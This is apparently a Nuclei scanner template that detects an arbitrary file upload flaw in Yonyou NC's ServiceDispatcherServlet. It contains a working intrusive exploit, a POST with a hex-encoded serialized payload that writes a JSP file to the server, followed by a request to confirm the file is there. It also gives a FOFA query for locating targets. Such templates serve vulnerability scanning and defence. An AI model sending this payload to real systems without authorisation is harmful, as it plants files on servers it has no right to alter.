id: yonyou-nc-dispatcher-fileupload info: name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload author: SleepingBag945 severity: critical description: | Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability. reference: - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md classification: cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: yonyou product: ufida-nc fofa-query: icon_hash="1085941792" tags: yonyou,intrusive,fileupload http: - raw: - | POST /ServiceDispatcherServlet HTTP/1.1 Content-Type: application/data Host: {{Hostname}} Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 {{hex_decode("0000015C7271890390CEA362632F6E8819F73AC2FA807D6CAF41AE772EC2DF10A2AB43A4C7BAF2C7F57909B2C19D6CF5DE6E565331E70CB3C2E70A3AF6D1E3C4480035F870288D440C41742E3EC659DA538CC3CAA2AE86569D62D002D8CE52D7D184BE7556F95C7567C1AC40FDD7502AF38BAE48C14D6A4F473779542BD7D1072973C4CD093C6BC1D0266BE82F15EEB96D146BAF89297059448A2EDDDF63463984FFC2247032EAD18E03422B87A8CC01E651A50DD09A1DE3C87ED376B43366DE024EE3880B7006A56DF97073A7472B444FF53433DD0AE63758FEB43A808B49DA0CB5B23783C3DE07C5182D35CD467D9CA2081B47EB7F604E84A1B7DA7E665A2B5D6B04F94C838AF6AE6E4829304C2D750A0A1400860F9D7611BA8DEA77AE8C79AD44F90C55A74DD3D06D27B5F3A583E8C3FCC27FC8C9B660F0C3B52B76DB7B3A0B87D04FE98DF57D2851FD93F40D04A3DA14C658E5BCBD9DCB74E35AB50818EF")}} - | GET /ncupload/n2d19a.jsp HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'just_a_test')" condition: and # digest: 4a0a00473045022100a0812e9a59b475f06b6a6162dd49790a981f613ce4320ee6c0dc23ed6e6ac4ac022007f6ea8fe6214ce1b3c4b726ac28ee83d616abc4f8d3ca59fa681d2f423591fe:922c64590222798bb761d5b6d8e72950